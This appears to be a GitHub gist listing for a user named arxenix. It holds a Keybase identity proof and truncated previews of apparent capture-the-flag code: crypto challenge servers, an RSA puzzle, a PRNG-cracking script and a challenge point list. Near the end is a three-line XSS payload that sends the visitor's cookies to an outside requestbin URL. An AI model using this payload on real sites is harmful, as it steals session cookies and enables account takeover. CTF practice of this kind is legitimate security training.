I hereby claim:
- I am arxenix on github.
- I am arxenix (https://keybase.io/arxenix) on keybase.
- I have a public key whose fingerprint is 582C 2575 C44B 9523 23E4 0EDB 07ED 8E52 121A BEF3
To claim this, I am signing this object:
#/usr/bin/env python | |
from Crypto.Cipher.AES import AESCipher | |
import SocketServer,threading,os,time | |
import signal | |
from secret2 import FLAG, KEY | |
PORT = 7765 |
var http = require('http'); | |
var express = require('express'); | |
var path = require('path'); | |
var cookieParser = require('cookie-parser'); | |
var bodyParser = require('body-parser'); | |
var crypto = require('crypto'); | |
var secrets = require('./secrets'); | |
var app = express(); |
I recovered some RSA parameters. Can you decrypt the message? | |
c = 293430917376708381243824815247228063605104303548720758108780880727974339086036691092136736806182713047603694090694712685069524383098129303183298249981051498714383399595430658107400768559066065231114145553134453396428041946588586604081230659780431638898871362957635105901091871385165354213544323931410599944377781013715195511539451275610913318909140275602013631077670399937733517949344579963174235423101450272762052806595645694091546721802246723616268373048438591 | |
n = 1209143407476550975641959824312993703149920344437422193042293131572745298662696284279928622412441255652391493241414170537319784298367821654726781089600780498369402167443363862621886943970468819656731959468058528787895569936536904387979815183897568006750131879851263753496120098205966442010445601534305483783759226510120860633770814540166419495817666312474484061885435295870436055727722073738662516644186716532891328742452198364825809508602208516407566578212780807 | |
e = 65537 |
var http = require('http'); | |
var express = require('express'); | |
var path = require('path'); | |
var cookieParser = require('cookie-parser'); | |
var bodyParser = require('body-parser'); | |
var crypto = require('crypto'); | |
var secrets = require('./secrets'); | |
var app = express(); |
import requests | |
from z3 import * | |
# xor_shift_128_plus algorithm | |
def xs128p(state0, state1): | |
s1 = state0 & 0xFFFFFFFFFFFFFFFF | |
s0 = state1 & 0xFFFFFFFFFFFFFFFF | |
s1 ^= (s1 << 23) & 0xFFFFFFFFFFFFFFFF | |
s1 ^= (s1 >> 17) & 0xFFFFFFFFFFFFFFFF | |
s1 ^= s0 & 0xFFFFFFFFFFFFFFFF |
class QSet: | |
def __init__(self, input=None): | |
self.__repr__=self.__str__ | |
self.qset = {} | |
if input!=None: | |
for item in input: | |
self.add_item(item) | |
def add_item(self, item, amt=1): | |
if item in self.qset: | |
self.qset[item]+=amt |
Caesar Salad:685 | |
Elemental:703 | |
The Flash:505 | |
Just open it:545 | |
Archive Me:360 | |
Chocolate:440 | |
Drive Home:378 | |
Best Ganondorf:170 | |
Get 'Em All:304 | |
Always So Itchy:218 |
import java.io.File; | |
import java.io.FileNotFoundException; | |
import java.util.Base64; | |
import java.util.Random; | |
import java.util.Scanner; | |
public class OTP { | |
public static void main(String[] args) throws FileNotFoundException { | |
File flag = new File("flag.txt"); |
var cookie = btoa(document.cookie); | |
var img = document.createElement("img"); | |
img.src = "https://requestb.in/qeqiheqe/"+cookie; |
I hereby claim:
To claim this, I am signing this object: